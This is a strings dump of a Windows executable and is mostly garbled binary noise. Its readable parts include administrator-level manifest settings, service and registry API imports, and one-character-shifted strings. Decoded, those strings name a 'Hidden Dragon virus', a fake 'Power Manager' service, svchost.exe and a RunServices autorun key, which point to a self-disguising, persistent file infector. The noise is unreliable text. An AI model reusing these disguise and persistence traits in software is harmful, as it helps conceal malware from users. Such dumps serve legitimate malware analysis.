`abcdefghijklmnopqrstuvwxyz{|}~
_`abcdefghijklmnopqrsuuvwwxyz
[\]^_`abcdefghijklmnoqqrsstuv
[\]^_`abcdefghijklmnoqqrsstuv=
AbC}E~GHIJK
[[\]^_`abct-gg
\{;<=>?>@ABDEFG
[\]^_^`abdefg@hijlmnonpqr
}{;<=>?>@ABDEFG HIJLMNONPQR
[\]^_^`abdefg<hijlmnonpqrtuvw
ADVAPI32.DLL
AE?.EWC
;ahZhcg\e``Bvbhbpji
&A(j*~,
aJ\5ce
aJlade
AM?M=QMQ
a]M.N.&$w'51.kmZ[Ke
AnSfvSvt~
AOCNEFGmI
=_aQGRG*({+3<Gl
)AQUNRL
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><ms_windowsSettings:dpiAware xmlns:ms_windowsSettings="http://schemas.microsoft.com/SMI/2005/WindowsSettings" xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</ms_windowsSettings:dpiAware></windowsSettings></application></assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXM[
_assert
atexit
AV\Ipq
]^'axcdeN(
{AZCNE_GO
A	Z[\Eq\_`
b"$$%&
 B0DFE
B234787h
+B78=>:>
B8H<E>HO
bad_alloc
BB=1UVGfjikG[d`_q]BA/eux5+
\BBCDFFG
]`bcdN
BC-#GGH
/<<BDCG6HDH
@!B#D%F'H)J+L-N/P1R3T5V7X9Z;\=^?`AbCdEfGhI
:<>@BDFHJLNPRTVXZ\^`bdfhjl
bD?m]^
BEF1P%IK
befiijk
bewbqj43/emm
BFDE1U
:/bHIJ
!B#]%['H)y+
B L"V$`&j(t*
bS\qno
b?t{}B
BVPGPJY%$\IMa[R[Ud0/Vjd[d^8uullsop>2fztktnHG;
Bxxyzc
'b)Y+[-
c#$%&'
c#$%&'()*+--./
c#$%&'()*+,-./0123456799:;;<=><
c#$%&'()*+,-./0123456799:;;<=>:
C0dF3c5
C7GIGD@F@
`CaC97
CadePPFhj/
Cbr@cukyi\oulx
$cc&(gg@,kk`0oo|5ss
%cc$)gg>-kkX1oop6ss
CCh	GG
CDEFG[
cdefgfhijlmnoHpqrtuvwvxyz|}~
cdefgfhijlmnoHpqrtuvwvxyz(
CDEFGFHIJLMNO$PQRTUVWVXYZ\]^_ZS
CDEFGHIJKLM
cdefghijklmnopqrstuvwyyz{{|}~
CDEFG|IRKMM
CDEFGL
CDGKM[
%CDUG0|\KL
_cexit
C:`_`feceejokq
+cH!R 
CloseHandle
CloseServiceHandle
CMIFGIIJKLMNO
c*MsoL
CopyFileA
" cpef
CreateFileA
CreateMutexA
CreateProcessA
CreateServiceA
~cS>a2
CVf9]a[Ggbhoao
cwtxYw
!\#D%&'-)*
.D*>\^
*+,}-D
d]^_`abc
`.data
dcdNP:fh
dcVdgfjik&\ih-
DE!847f'c
D+EAGCOE>JHZF
DeleteService
dgijkXv
DibohfTfswjdfDpogjh3B
dikmi~v
DK2}BLM
-DlCr3
^!d#n%
:\d^n`?ogsidcoWji{qxx
D--./P
DQQWYX\K]Y]
drguipoo,
DXIHTJ\
dY*[0DE
Dy6799:;<=>
&(()e	
E5GGIYKkMvO
=E&9I,8DN?
ECDIFGz
EdtFpymwuuunx
!#ee`@ih[i^
EFG2P(JL
EfGuIjK
ef'pijklmno
ef'pij+Pmn/(pr3
e>HZYZ
e[\$^k`ab
ek'Meo'
*EO+_`
 E;:;o3
eO\3ij
E?Q4P/XPYO)a]O
ERQTJVKJ
ERRXZY]L^Z^
e.U.HI
eX3567
EX^9fgdFk\jr>\p^?uajndfqk
!Exa_`
ExitProcess
f'&()*,-./
f0I2=4N6>r1
fa](|Cf'
F\[ctv
FFM?SP4
{f|fTR
FGH1h_LM
\fghijk
FGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
fGzuzw|y
*FH``a
F"I(K.M4O:Q@SFULWRYX[f]l_raxc~e
_fileno
FindClose
FindFirstFileA
FindNextFileA
flkmpk
fllmV\
FlushFileBuffers
_fmode
+f-N/W1W3
fOVzjk8
_fpreset
fprintf
f\\ua]
'FV6XWOUO=c[QD
 FyY`a
g'()*+
g'()*+,-./0123456789:;==>??@AB
g'()*+,-./01235567789:<=>??@ABDEFGIIJKLMNOQQRSTUVW
(+,~.g0GwDu6
g'1)*+
G8QUST
_gabc 
g'B)*+
GcIJKI
GetCommandLineA
GetCurrentDirectoryA
GetDriveTypeA
GetFileAttributesA
GetFileTime
GetLastError
__getmainargs
GetModuleFileNameA
GetModuleHandleA
GetProcAddress
GetStartupInfoA
GetTempPathA
GetVersionExA
GetWindowsDirectoryA
GFHIJLMNO$PQRTUVWVXYZo
GGHIJK
GGHIJKLMNO
ghijklmnorqrs
GHPTJM
g*N*`k/
goijk0
gPlnkl
gv7Y9:;
g]]vb^
g!w#m%j'b)J+Q-
gyijk@
@))*+H
h0/0V234
H1123X
H;./.45555;fI><
H47CH>EE
H4JFLXNbPxR
H9JWLbNjPuR|T
h'_*BEh)
hdijmjk
HEFGHIJK
^`HFRbc
%H#Gbc
<H:H8LHL
hi*++,-.:1234567{
hiE\X[
hij"EnopY
HIJLMNONPQRTUVW
H!J#D%F'H)J+L-N/P1R3T5V7X9Z;\=^?`AbCdEfG
@H@J@"%I%!&'*T&
h j+leovq
H!J#L%F'H)J+L-N/P1R3T5V7X9Z;\=^?`AbCdEfGhI
h$j.l<o^qhsru|w
h	j.lzo
HlriXl{x
Hmpcbm]
h_NONTS
<HQIHL?C
\HRSTUVWXYZ[
hVQRSp
#, hXfh_ff76\lml`mf@Gs|tswjnXm{ovu
hY&'()*+
"#$%&'i'*+,-./
;I2ZH=qK p
[`I\Bcd
>?@)I<CD
.idata
ie]^_`anb
#IEQG@LJ\H'WO[QLKW?RQcY``
IFHaabb
iga^ssSSP
IGHoJKL
[i]h_`abcdefg
;I=H?@ABCDEFG
,IHsde
II+,`	
Ijeefo!Esbhpo!wjsvt/!Cpso!jo!b!uspqjdbm!txbnq/
ijklmno
ijklmnopqrs
ijkymno
^+ijol
ILNOP:lTUV
InterlockedIncrement
Internal Compiler Bug: No runtime type matcher.
"IQ&EU8DPZK
i!V'()
'IX604V
IZK\M^O`QbSdUfWhYj[l]n_parctevg
-J0\2n4
/j1a3c5
{JF89:
~[jh`H
, jhij
?jHki^apqnrGgdxzxlX{o~q{
$'=JJNJQeQT`e[bb5ik\9:
jklmnoopqr
JKvMNON
j*l8oBqts~u
:J*L="<JAJD
J!L#$%&'M)
<J?MAHGG
JMLM9U
jmnqqss
.(jnlm
"jppqZ\
)J+T-]/
Jukywr
,]\jwx
+k.	/	
k+--./
#K=>??
k345 x/8:
k41z[\U
K:4+PQQZUXUVWXYZ
K,a]ac
KaPTy{
k/ !B#
KERNEL32.dll
K`\hz{
[KJ\X\
K;:LHL
KLMNO~
klmnopqrstuvw
klmnopqrstuvw8
klmnopqrsuuvwxyz{}}~
klmnopqrswuvw
klmnr`tjr
KMMNO\
KMMNORQRSWUVWYYZ[
kmnY[_qs
K!M)O0QeSyU
K\M^O`QbSdUfWhYj[l]n_parctevgxi
K\M^O`QbSdUfWhYj[l]n_parctevgxizk|m
KQ9KVTU
;k=s?nArCmEFG
/ky|}hPU
KYMXOPQRS
'>^;l-
l$()*+
l0/*+,
+L-`/`1b3g567
L456789:;<=>?@EBCEAEF}IJKWMNO
L8;GLBII
Leb#Dif'Dmj+xRn/Hur3Hyv7H}z;H
L-	EGH
lfsofm43/emm
lIKKLNM
l!JKL5
LLLNO_O
`l^l\plp&
LMJ-A@CHVF4HWUUU[N
lmno[z
lnopY!rstB
LoadLibraryA
lWIqrs_
LYZ[\H'
Lz;<=>?@ABCCDEFHIJK
m%(*+,
malloc
memcpy
memset
|M(<gh
M\hcmqd2
MH<I>?+MOCLEF2MVJOLM
../../../mingw/mthr_stub.c
MMN8atQR
mnopqrstuvw
mnopqrstuvwx
MNO]Q\STUVW
M[OZQRSTUVW
MPQ<[BTV
msvcrt.dll
Mwmzpr^~y
~,	n#$%}
/N^7M`b0Se[iYEegmi
N7\#PR
Nbobhft!uif!qpxfs!tbwf!gfbuvsft!pg!uif!dpnqvufs/
N d"w%
nenes$%0*q
nIoIGE
.NL]aN`h
n`-mMk,
!&NoAB
NOP;P)SU
)nOPQ{
NOPQRSTUVWXYZ[
N?O?'%x((9?kxwzp|Nr
Np17yu5
n&p@sLuiwsy{{
'@)N+p-z/
$<nqr\\9vw
o'*,-.
o/0123456789:;<=>?@ABCEEFGGHIJ
o/1123
o/1123D
O2RCThVuX}Z
o/8123
oc5\$OP
/oDe&bEiJk,<
)O"eij
O-gijW
O@|jkl
o/K123
)OKWMFRPbN-]UaWRQ]EXWi_ff:h_OmgmCpwqx
onoYPEqs
ooDEEF
.oopqrstuvw
OoQRSY
OpenSCManagerA
OpenServiceA
OPQbSTeVWXYj[\m^_`abctefghijklmno
opqrs`
opqrstuvwxyz{|}~
oqr]PJuw
o&q.s9u[xcz}|
Or6?89
OrlLooVxi\kk\q
ORSTUVW
osp	ow
%OSXK/IWNWQ
O\[^T`2VU5b
'()*+p-
P>5xmM7
&&'()*+,-./P6
p9+"5$5
P<9:&h
p b#|$f'
$PDAUGU
__p__environ
PIVmde23456789:;
PL>?@t
PNOPQRSTUVW
Poqr\a\vw
PQRS:8
PQRSTUF
PQRSTUVWXYZ[
p+r9tGwOyc{m}z
PRacbfUgcg
pR!klm
pRPLjl1
PRZTdZ`Z
!;P+SU
p(#tuv_
p;v=|?
pZ\Btu
'()*+q-
_qabc0
@qBCEEFG
QbdlEEFmQbsbn
~^qBRB
Q[_dgeY
Q=_?lB:EAGUIuK
QLZWOW??<s|}
./Qn23qr67Y9:;xy>?~
q[\nuv
QOPQRSTUVWXYZ[
qpq*p3uv
QpxfsNbobhfs
Qpxfs!Nbobhfs
QpxfsNbobhfsNvubou
qr3|uvwxyz{
qRC2123mR
QRSSXVW
$qrstu
QRSTUVW
qrstuvwxyz{;
qrsvuvw
	q	s	[	?LMJ
q!s+u2w8y>|i~
r34567
r3456789:;>=>?
rbasos"yffyl(lyy
??,RBC
ReadFile
RegCloseKey
RegCreateKeyExA
RegisterServiceCtrlHandlerA
RegSetValueExA
ReleaseMutex
r[lHuv
Rstu|_
R]STVSTY^cW
R+U3WFY
rv.>Wb
s34567
s3456789:;<=>?@ABCDEFGIIJKKLMN
s3456789:;<=>?@ABCDEFGIIJKKLMNPQRSSTUVXYZ[]]^_`abceefghijk
s3456789:;<=>?@ABCDEFGIIJKLMNOOPQRH
s3456789:;E=>?
SaU`WXYZ[\]^_
>S\Emn
__set_app_type
SetEndOfFile
SetFileAttributesA
SetFilePointer
SetFileTime
_setmode
SetServiceStatus
SetUnhandledExceptionFilter
SfhjtufsTfswjdfQspdftt
signal
(?s=m.
SSTeVWt
StartServiceA
StartServiceCtrlDispatcherA
strcat
strcmp
strcpy
S!T#R%j't)v+,-./Pt
(stu-Tyz{d
stuvwxyz{|}~
STUVWXYZ[\]^_<~
STUVWXYZ[\]^_`abcdefgiijkklmn
SUUVWXYZ[[\]^`abc
/`\Sz{
T	2346
t!B#Z%T'Y)e+L-
t$dw#g%q.
T''(eo
tgd/emm
TgdJtGjmfQspufdufe
TheiLptn
!This program cannot be run in DOS mode.
*T[[ln
TlsAlloc
TlsGetValue
TlsSetValue
Tpguxbsf]Njdsptpgu]Xjoepxt]DvssfouWfstjpo]SvoTfswjdft
TSFTWVZY[
TubsuTfswjdfDusmEjtqbudifs
t\?uvw
tuvwxyz{
tuvwxyz{|}~
TVXZ\^`bdfY^01234567|9o;~=p?
twdiptu/fyf
twyz{e
T=ZWXY
T=ZyXY
u89:;<=??@ABC
Ubc`+!"klm%ml_mposrt/erq6#7#
UESULSS$
Uk/412
u-nXt5
%U]UZ*ZNK_Q5ObX
UvWXYZ[
uvz{{{~
.U],XY]R
U:X\Z~\
uYvYNL
!%"&&)&'()*+V
{ !"V#
)V1WS_UNZXjVEXWjh`lr
v"4456p
VbTbRfbf
vccvi%ivx
>VdlYks
+V(JH\OPO]<_SbU_f
_vklqrn
vo<F:VWX
+v<oyn
&v{t}#t5o
/v}>>UaS
vw2yz{
VW_cY\43Ze[igKcs2?53487<:E9mxn|z^v
vwx	{{\~~
vwxyz{|}
vwxyz{|}~
v%x2zo}
VxxybZ5|}
++vxyd[j|~
w6yD|f~t
w789:;
w789:;'
w789:;<=>?@ABCDEFGHIJKMMNOOPQRA
w789:;<=>?@ABCDEFGHIJKMMNOOPQRU
w789:;<=>?@ABCEEFGGHIJ
w7:9:;
w7E9:;
\\W7`_R`Uy
w7S9:;
WA\[\]
WaitForSingleObject
}wFFCz
WiYZ[ 
*WKL-W`T^\\\U_fFhg_e_lQ
@WLMRSOS
WriteFile
WsYZ[i
WVIWZY]\^
w'>V<l-
wv|}uA
WW* [[
WW*#[[ '__
WWH"[[:&__&*ccdefg
wwx7z||}
wwxyzi
wxyz{{|}~
WXYZ[[
WXYZ[\]^_`abcdefghijkmmnoopqr
WXYZ[\]^_`abcdefghijkmmnoopqrY
W&Y0[>]`_jatc
$!wy{x
>/wYZ[
wzyz{~}~
[X%&'()*+
\]^xabclefg
=x?`AgC
X b"x$
Xf'G)*+<`n/P123
X[\G[L_a
XK>?>DEEEK
 !"#$%&'xm~+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgP~
xm>[EXY
XO>?>DIrIEFEIIIz^RP
Xo_^plp
&XPOpr
XQRSTUVW
X!/#.%S'H)
xvvw~a\
XYZ[\]^_`abcPw
xZ9crt
X	Z[,]^_r
"=yBc$X
yc\m}~
Y!d#u%
yE-789:
Yg[f]^_
Y[jlko^plp&
ykzkRP
YXYCP/[]
yz{|}~
@yz{3:
YZ[\]^_`abc[
"YZc\l
YZ[FP4^`
^Z_`c`a
|!Z[\E\
'Z)J+i-N/U1
z$%k)o
Z<P5TV
<@zpp%|lz|szzJ0@>A4RR
z=q<XWz;
zyzdPP|~